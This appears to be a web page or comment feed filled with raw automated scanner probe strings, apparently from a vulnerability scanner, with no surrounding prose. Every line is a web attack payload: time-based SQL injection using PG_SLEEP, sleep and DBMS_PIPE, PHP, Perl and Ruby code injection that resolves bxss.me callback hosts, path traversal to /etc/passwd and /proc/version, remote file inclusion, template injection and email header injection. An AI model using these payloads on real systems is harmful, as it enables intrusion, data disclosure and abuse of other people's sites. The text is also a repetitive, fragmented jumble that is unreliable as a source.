@@uyTs6

1′”

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

-1)) OR 259=(SELECT 259 FROM PG_SLEEP(15))–

-5) OR 519=(SELECT 519 FROM PG_SLEEP(15))–

-5 OR 260=(SELECT 260 FROM PG_SLEEP(15))–

(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/

if(now()=sysdate(),sleep(15),0)

1

1

@@Fstxb

1′”

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

-1)) OR 568=(SELECT 568 FROM PG_SLEEP(15))–

-5) OR 606=(SELECT 606 FROM PG_SLEEP(15))–

-5 OR 391=(SELECT 391 FROM PG_SLEEP(15))–

(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/

if(now()=sysdate(),sleep(15),0)

1

1

19201036

<!–

‘”

/xfs.bxss.me

admin-ajax.php/.

admin-ajax.php

admin-ajax.php

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

‘.print(md5(31337)).’

‘+’A’.concat(70-3).concat(22*4).concat(108).concat(68).concat(112).concat(85)+(require’socket’
Socket.gethostbyname(‘hityj’+’hvsbnqxj86afc.bxss.me.’)[3].to_s)+’

“+”A”.concat(70-3).concat(22*4).concat(98).concat(68).concat(106).concat(68)+(require”socket”
Socket.gethostbyname(“hitcy”+”vubiymcr261d5.bxss.me.”)[3].to_s)+”

“;print(md5(31337));$a=”

‘;print(md5(31337));$a=’

bxss.me/t/xss.html?%00

HttP://bxss.me/t/xss.html?%00

“.gethostbyname(lc(“hitjc”.”jowqhktg958e0.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(99).chr(74).chr(118).chr(80).”

‘.gethostbyname(lc(‘hitry’.’xpmfxuyi2bd4e.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(102).chr(83).chr(111).chr(69).’

‘”()

^(#$!@#$)(()))******

!(()&&!|*|*|

)

bxss.me

http://bxss.me/t/fit.txt?.jpg

Http://bxss.me/t/fit.txt

1some_inexistent_file_with_long_name.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

&n919980=v979904

${10000483+9999811}

to@example.com>
bcc:009247.119-171133.119.9da14.19193.2@bxss.me

bcc:009247.119-171132.119.9da14.19193.2@bxss.me

/.././.././.././.././.././.././.././../etc/./passwd%00

../../../../../../../../../../../../../../../proc/version

KabJYSQt

@@CXE1Y

@@my6xs

19986403

<!–

‘”

‘.print(md5(31337)).’

1′”

“;print(md5(31337));$a=”

‘;print(md5(31337));$a=’

/xfs.bxss.me

admin-ajax.php/.

1′”

admin-ajax.php

admin-ajax.php

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

‘+’A’.concat(70-3).concat(22*4).concat(109).concat(66).concat(100).concat(84)+(require’socket’
Socket.gethostbyname(‘hitaq’+’bfmavagzbbb5d.bxss.me.’)[3].to_s)+’

“+”A”.concat(70-3).concat(22*4).concat(115).concat(73).concat(100).concat(70)+(require”socket”
Socket.gethostbyname(“hitjz”+”bhqfvyda316ae.bxss.me.”)[3].to_s)+”

bxss.me/t/xss.html?%00

HttP://bxss.me/t/xss.html?%00

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

“.gethostbyname(lc(“hitqx”.”fqyptguza44d6.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(110).chr(84).chr(117).chr(65).”

‘.gethostbyname(lc(‘hitgt’.’bisfiejh74439.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(104).chr(71).chr(98).chr(78).’

‘”()

^(#$!@#$)(()))******

!(()&&!|*|*|

)

@@31wbe

-1)) OR 119=(SELECT 119 FROM PG_SLEEP(15))–

&n954148=v925578

-1)) OR 896=(SELECT 896 FROM PG_SLEEP(15))–

-5) OR 128=(SELECT 128 FROM PG_SLEEP(15))–

bxss.me

http://bxss.me/t/fit.txt?.jpg

Http://bxss.me/t/fit.txt

1some_inexistent_file_with_long_name.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

-5) OR 323=(SELECT 323 FROM PG_SLEEP(15))–

-5 OR 134=(SELECT 134 FROM PG_SLEEP(15))–

-5 OR 110=(SELECT 110 FROM PG_SLEEP(15))–

${9999869+10000397}

1′”

/.././.././.././.././.././.././.././../etc/./passwd%00

../../../../../../../../../../../../../../../proc/version

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

to@example.com>
bcc:009247.119-169327.119.9da14.19193.2@bxss.me

bcc:009247.119-169326.119.9da14.19193.2@bxss.me